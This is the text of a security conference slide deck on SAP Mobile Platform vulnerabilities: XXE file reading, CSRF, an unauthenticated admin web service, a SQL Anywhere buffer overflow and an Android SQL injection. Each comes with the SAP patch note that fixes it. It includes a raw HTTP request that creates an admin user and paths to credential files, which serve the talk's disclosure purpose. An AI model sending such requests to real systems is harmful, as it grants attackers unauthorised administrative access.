Attacks on SAP Mobile

Invest in security to secure investments

Attacks on SAP Mobile

Vahagn Vardanyan. ERPScan

Vahagn Vardanyan

SAP and Web application researcher

Specialist degree in information security

2

@vah_13

About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP

• Leader by the number of acknowledgements from SAP ( 150+ )

• 60+ presentations key security conferences worldwide

• 25 Awards and nominations

• Research team - 20 experts with experience in different areas of security

• Headquarters in Palo Alto (US) and Amsterdam (EU)

3

Agenda

4

About SAP Mobile Platform SAP Control Center SAP SQL Anywhere services SAP Mobile Server SAP Mobile Platform vulnerability Decrypt GIOP protocol XXE SAP Control Center CSRF in SMP 3.0 Cassini 1.0 SQL Anywhere BoF SAP EMR Unwired SQL injection Conclusion

SAP Mobile Platform

5

SMP architecture

6

SMP protocols

SUP 2.1.3 SUP 2.2 SMP 2.3 SMP 3.0

SMP Messaging x x x x

SMP Replication x x x x

HTTP Rest API x x x

SAP Agentry x x

8

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server

9

SAP Control Center

• Working process: sccservice.exe

• Open ports: • 2100 (Messaging service)

• 8282/8283 ( SCC )

• 9999 (RMI)

10

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server

11

SQL Anywhere

• Version 3: 1992

………………………….

• Version 10: 2006 - renamed SQL Anywhere (high availability, intra-query parallelism, materialized views)

• Version 11: 2008 (full text search, BlackBerry support)

• Version 12: 2010 (support for spatial data)

• Version 16: April 18, 2013 - (faster synchronization and improved security)

12

SQL Anywhere

13

SMP services

SAP Control Center

SAP SQL Anywhere services

SAP Mobile Server

14

SAP Mobile Server

• MobiLink

• AdminWebServices

• MlsrvWrapper

• InfoboxMultiplexer

• OBMO

• JMSBridge

15

SAP Mobile Server (MobiLink)

16

AdminWebServices

• Uses Cassini Web Server 1.0

• Listens to the local port 5100

17

SAP Mobile Platform vulnerabilities

18

Decrypting the SAP Mobile Platform GIOP protocol

19

Decrypting the SAP Mobile Platform GIOP protocol

• GIOP – General Inter-ORB Protocol (GIOP) is the abstract protocol by which object request brokers (ORBs) communicate

• Uses mlsrv16.exe (Mobilink) – port 2000

20

XXE in the SAP Mobile Platform portal page

CVE-2015-2813

21

XXE in the SAP Mobile Platform portal page…

22

XXE in the SAP Mobile Platform portal page…

• Portal URL: https://IP_ADDR:8283/scc

• web.xml & services-config.xml

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

<servlet-mapping>

<servlet-name>MessageBrokerServlet</servlet-

name>

<url-pattern>/messagebroker/*</url-pattern>

</servlet-mapping>

23

…XXE…

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

********************************

<channel-definition id="scc-http"

class="mx.messaging.channels.HTTPChannel">

<endpoint

url="http://{server.name}:{server.port}/scc/messagebroker/http"

class="flex.messaging.endpoints.HTTPEndpoint" />

</channel-definition>

********************************

1. /scc/messagebroker/amfpolling

2. /scc/messagebroker/amfsecurepolling

3. /scc/messagebroker/http

4. /scc/messagebroker/httpsecure

5. /scc/messagebroker/amflongpolling

24

…XXE

25

Read file with XXE

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

26

Decrypt sup.imo.upa

27

SAP Mobile Platform unauthenticated access to other servlets

• Architecture and program vulnerabilities in SAP’s J2EE engine (BlackHat USA 2011)

• web.xml files revealed hidden methods to: – Read and generate logs

28

Prevention

Install SAP security note 2125358 SAP Mobile Platform XXE vulnarability

29

CSRF in SMP 3.0

30

CSRF in SMP 3.0

31

CSRF in SMP 3.0

32

CSRF in SMP 3.0

33

• addAdministrator

• addRepository

• removeServerLogs

• createApplication

• createBackendConnection

********************

Prevention

Install SAP security note 2114316 SAP Mobile Platform CSRF vulnarability

34

Cassini 1.0

35

AdminWebService

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencoded

Content-Length: length

strUserName=Admin2&strActivationCode=123QWEasd&iExpirat

ionHours=100

36

AdminWebService

37

SAP SQL Anywhere Buffer Overflow/Code Execution

CVE-2015-2819

38

SAP SQL Anywhere BoF/Code Execution

• CVE-2008-0912 – The MobiLink server is affected by a heap overflow which happens

during the handling of strings like username, version, and remote ID (all pre-auth) which are longer than 128 bytes

• CVE-2014-9264 – Stack-based buffer overflow in the .NET Data Provider in SAP SQL

Anywhere allows remote attackers to execute arbitrary code via a crafted column alias

39

First PSH request

40

First PSH request

•

41

SQL Anywhere BoF

42

Prevention

Install SAP security note 2108161 Denial of service in SAP SQL Anywhere

43

SAP EMR Unwired SQL injection

CVE-2013-7096

44

SAP EMR Unwired SQL injection

• CVE-2013-7096 (CVSS 7.5)

• AndroidManifest.xml: <provider android:name=".providers.ModiDataDbProvider"

android:authorities="com.sap.mobi.docsprovider" />

1. content://com.sap.mobi.docsprovider/documents/offline_cat

2. content://com.sap.mobi.docsprovider/documents/offline/

3. content://com.sap.mobi.docsprovider/documents/sample

4. content://com.sap.mobi.docsprovider/documents/online

5. content://com.sap.mobi.docsprovider/documents/offline_auth

6. content://com.sap.mobi.docsprovider/documents/offline

7. content://com.sap.mobi.docsprovider/documents/online_auth

8. content://com.sap.mobi.docsprovider/documents/sample/

9. content://com.sap.mobi.docsprovider/documents/online_cat

45

Prevention

Install SAP security note 1864518 Security Improvements for MOB-APP-EMR-AND

46

Conclusion

47

SAP Guides

Regular security assessments

Monitoring technical security

Segregation of Duties

Security events monitoring

Each SAP landscape is unique and we pay close attention to the requirements of

our customers and prospects. ERPScan development team constantly addresses

these specific needs and is actively involved in product advancement. If you wish to

know whether our scanner addresses a particular aspect, or simply have a feature

wish list, please e-mail us. We will be glad to consider your suggestions for the

future releases or monthly updates.

48

About

228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

USA HQ

Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

EU HQ

www.erpscan.com [email protected]